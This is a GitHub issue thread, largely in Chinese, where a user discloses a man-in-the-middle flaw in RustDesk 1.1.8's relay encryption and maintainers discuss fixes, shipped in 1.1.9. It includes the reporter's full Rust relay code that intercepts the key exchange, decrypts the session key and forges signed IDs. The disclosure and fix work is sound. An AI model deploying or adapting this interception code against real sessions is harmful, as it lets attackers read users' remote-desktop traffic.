### ISSUE TITLE
secure

### ISSUE THREAD

**Issue by lbl8603** [rustdesk/rustdesk#225]
[感谢你们开源这一作品，同时我也希望它能更好。接着昨天提出的中间人攻击的问题[https://github.com/rustdesk/rustdesk/issues/223](https://github.com/rustdesk/rustdesk/issues/223)
我进一步证实了自己的想法，如下图所示，客户端显示的是加密中继连接，并且客户端没有察觉到异常，可是中间人却已经将传输的数据解密了
![2](https://user-images.githubusercontent.com/49143209/132795048-9c160952-1408-4025-8b8b-19b1b1e71475.jpg)，
![image](https://user-images.githubusercontent.com/49143209/132795305-1d6c58d1-ec9a-4f35-8ef0-45da07e8c449.png)

**Comment by lbl8603** [comment]
我使用的是你们提供的1.1.8版本的客户端

**Comment by rustdesk** [comment]
Really, how do you dec it?

**Comment by rustdesk** [comment]
How do you get the symmetric key?

**Comment by rustdesk** [comment]
You are using the demo server, demo server does not support encryption.

**Comment by lbl8603** [comment]
那客户端如何判断服务器是不安全的呢，我在客户端并没有察觉到任何异常信息，客户端也告知我是加密的连接，可是他并不安全

**Comment by lbl8603** [comment]
我改造了demo server，让他支持了中继加密

**Comment by rustdesk** [comment]
> 我改造了demo server，让他支持了中继加密

How do you get the symmetric key?

**Comment by lbl8603** [comment]
我是rust初学者，希望你能看懂我写的：
async fn relay(
    stream: FramedStream,
    peer: FramedStream,
    stream_pk :std::vec::Vec<u8>,
	stream_id:String,
) {
    let mut peer = peer;
    let mut stream = stream;
    let mut  save_si = SignedId::new();
	let mut  save_stream_si = SignedId::new();
	let (sk, _pk) = Config::get_key_pair();
	let (our_pk_b_0, our_sk_b_0) = box_::gen_keypair();
	let (our_pk_b_1, out_sk_b_1) = box_::gen_keypair();
    loop {
        tokio::select! {
            res = peer.next() => {
				//接收控制端消息
                if let Some(Ok(bytes)) = res {
                    if let Ok(msg0) = Message::parse_from_bytes(&bytes){
						println!("peer.next():{:?}", msg0);
                        if let Some(hbb_common::message_proto::message::Union::public_key(pk)) = msg0.union {
							{//使用控制端的公钥建立加密连接
								let nonce = box_::Nonce([0u8; box_::NONCEBYTES]);
								let mut pk_ = [0u8; box_::PUBLICKEYBYTES];
								pk_[..].copy_from_slice(&pk.asymmetric_value);
								let their_pk_b = box_::PublicKey(pk_);
								let symmetric_key =
									box_::open(&pk.symmetric_value, &nonce, &their_pk_b, &out_sk_b_1)
										.map_err(|_| {
											println!("Handshake failed: box decryption failure");
											return;
										}).unwrap();
								let mut key = [0u8; secretbox::KEYBYTES];
								key[..].copy_from_slice(&symmetric_key);
								peer.set_key(secretbox::Key(key));
							}
							{//伪造控制端的公钥，发给被控制端
								let their_pk_b = if save_stream_si.pk.len() == box_::PUBLICKEYBYTES {
									let mut pk_ = [0u8; box_::PUBLICKEYBYTES];
									pk_[..].copy_from_slice(&save_stream_si.pk);
									box_::PublicKey(pk_)
								} else {
									break;
								};
								let key = hbb_common::sodiumoxide::crypto::secretbox::gen_key();
								let nonce = box_::Nonce([0u8; box_::NONCEBYTES]);
								let sealed_key = box_::seal(&key.0, &nonce, &their_pk_b, &our_sk_b_0);
								let mut msg_out = Message::new();
								msg_out.set_public_key(PublicKey {
									asymmetric_value: our_pk_b_0.0.into(),
									symmetric_value: sealed_key,
									..Default::default()
								});
								stream.send(&msg_out).await.ok();
								stream.set_key(key);
								continue;
							}
                            //println!("asymmetric_value:{:?},symmetric_value:{:?}", pk.asymmetric_value, pk.symmetric_value);
                        }
						stream.send(&msg0).await.ok();
                    }
                    
                } else {
                    break;
                }
            },
            res = stream.next() => {
				//接收被控制端消息
                if let Some(Ok(bytes)) = res {
					 
                    if let Ok(msg0) = Message::parse_from_bytes(&bytes){
						println!("stream.next():{:?}", msg0);
                        if let Some(hbb_common::message_proto::message::Union::signed_id(si)) = msg0.union {
							{//接收被控制端的签名数据
								save_stream_si = si;
							}
							{//伪造签名数据,发给控制端
								let mut sk_ = [0u8; sign::SECRETKEYBYTES];
								sk_[..].copy_from_slice(&sk);
								let sk = sign::SecretKey(sk_);
								let mut msg_out = Message::new();
								let signed_id = sign::sign(stream_id.as_bytes(), &sk);
								msg_out.set_signed_id(SignedId {
									id: signed_id,
									pk: our_pk_b_1.0.into(),
									..Default::default()
								});
								peer.send(&msg_out).await.ok();
								println!("伪造的签名数据：{:?},",msg_out);
								continue;
							}

                            
                           // println!("id:{:?},pk:{:?}", si.id, si.pk);
                        }
						 peer.send(&msg0).await.ok();
                    }
                   

                   
                } else {
                    break;
                }
            },
        }
    }
}

**Comment by rustdesk** [comment]
where is the "中间人"?

**Comment by lbl8603** [comment]
我完全可以在某个代理上做到这个，让中继服务器也无法感知

**Comment by lbl8603** [comment]
只是为了简单起见，我将破解逻辑放在了中继服务器实现。并且我认为既然采用了端到端加密，那中继服务器也是不可信任的，你不能依赖中继服务器来保证安全性

**Comment by rustdesk** [comment]
> 你不能依赖中继服务器来保证安全性

make sense

**Comment by lbl8603** [comment]
而且客户端好像也无法认证中继服务器

**Comment by rustdesk** [comment]
Do you have any idea to solve it?

**Comment by rustdesk** [comment]
Thank you very much for proposing this.

**Comment by lbl8603** [comment]
我认为用户的密码只有两端客户端知道，用它参与加密会提升安全性

**Comment by rustdesk** [comment]
> 我认为用户的密码只有两端客户端知道，用它参与加密会提升安全性

make sense

**Comment by rustdesk** [comment]
> 而且客户端好像也无法认证中继服务器

Yes, can not assume relay server is secure.

**Comment by lbl8603** [comment]
我建议再增加一个功能：客户端可以设置加密级别，能拒绝主动拒绝非加密的连接

**Comment by rustdesk** [comment]
> 我建议再增加一个功能：客户端可以设置加密级别，能主动拒绝非加密的连接

make sense

**Comment by rustdesk** [comment]
> 我认为用户的密码只有两端客户端知道，用它参与加密会提升安全性

Any idea if do not use password?

**Comment by lbl8603** [comment]
> Any idea if do not use password?

使用证书认证客户端？不过这样使用客户端会变得很复杂。或者增加客户端对中继服务器认证，让中继服务器变得安全可靠（不过这样也只能信任自己搭建的中继服务器）。

**Comment by lbl8603** [comment]
从这个问题衍生出来一个建议：我发现目前的客户端和服务器通信（RequestRelay和打洞）是不进行加密的，这会对外暴露客户端的行为，并且中继服务器的key会被泄露出去，这样个人搭的中继服务器就可以能被其他人盗用了。和服务器建立的连接是否也能加密呢，比如用tls？

**Comment by rustdesk** [comment]
> 客户端和服务器通信

Yes

**Comment by rustdesk** [comment]
有没有兴趣微信聊一下？可以邮件我

**Comment by lbl8603** [comment]
请问你的邮箱是多少呢

**Comment by rustdesk** [comment]
info@rustdesk.com

**Comment by lbl8603** [comment]
好的，发送邮件给你了

**Comment by ekuiperemr** [comment]
Appears to me that TLS is the way you intend to go. I am new to rustdesk and rust but want to contribute.

**Comment by rustdesk** [comment]
> contribute

Welcome

**Comment by lbl8603** [comment]
> Appears to me that TLS is the way you intend to go

你有没有其他建议呢

**Comment by rustdesk** [comment]
solution:
sign id+pk, and LoginRequest with sha(password+signing pk)

**Comment by rustdesk** [comment]
further enhancement: to avoid signing pk being hijacked, add async encryption to hbbs

**Comment by tzfljuv** [comment]
no one mentioned this so I'll add that it's commonly seen among end-to-end encrypted messengers to verify partner's authenticity by exchanging/verifying public key over secure channel, usually via QR scanner or by comparing a group of characters.

Some examples on this:

- https://element.io/
- https://conversations.im/
- https://briarproject.org/download-briar/

And also this:

- https://signal.org/docs/

**Comment by tzfljuv** [comment]
@rustdesk Also, this issue deserves at least a pin. To me the vulnerability demostrated by @lbl8603 needs to be fixed ASAP, and don't advertise RustDesk as e2e encrypted just yet because you're still placing trusts on top of the server, and that's the exact way to violate the whole point of e2e encryption.

**Comment by rustdesk** [comment]
we have put the fix in the latest version 1.1.9

**Comment by rustdesk** [comment]
just forgot to close after fix committed.
